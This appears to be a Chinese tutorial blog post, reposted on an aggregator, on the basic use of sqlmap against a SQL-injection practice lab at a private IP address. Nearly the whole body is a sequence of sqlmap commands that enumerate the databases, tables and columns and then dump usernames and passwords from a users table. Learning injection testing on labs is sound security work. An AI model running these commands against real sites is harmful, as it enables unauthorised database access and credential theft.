sqlmap基本使用 - 走看看

zoukankan html css js c++ java

sqlmap基本使用

sqlmap 使用

需要安装python2的环境

使用方法：

用最基础的get型注入开始

1、当我们发现注入点的时候，

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1"

2、查看所有的数据库

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dbs

3、查看当前使用的数据库

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --current-db

4、发现使用的是security数据库，接下来对此数据库进行查询

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --tables -D "security"

5、查出所有表以后，对users表的列名进行查询

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --columns -T "users" -D "security"

6、users表中的列名已经知道了，可以直接查出所有数据

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dump -C "id,username,password" -T "users" -D "security"

在“用户”-》“.sqlmap”-》“output”可看到查询结果

查看全文

相关阅读:
Ubuntu 16.04
每天一道LeetCode--389. Find the Difference
每天一道LeetCode--371. Sum of Two Integers
Ubuntu 16.04 小飞机启动失败
 每天一道LeetCode--344. Reverse String
leetcode1458 Max Dot Product of Two Subsequences
CF1313C2 Skyscrapers (hard version)
CF1295C Obtain The String
CF1251D Salary Changing
CF1286A Garland

原文地址：https://www.cnblogs.com/gx991010/p/12987201.html

Copyright © 2011-2022 走看看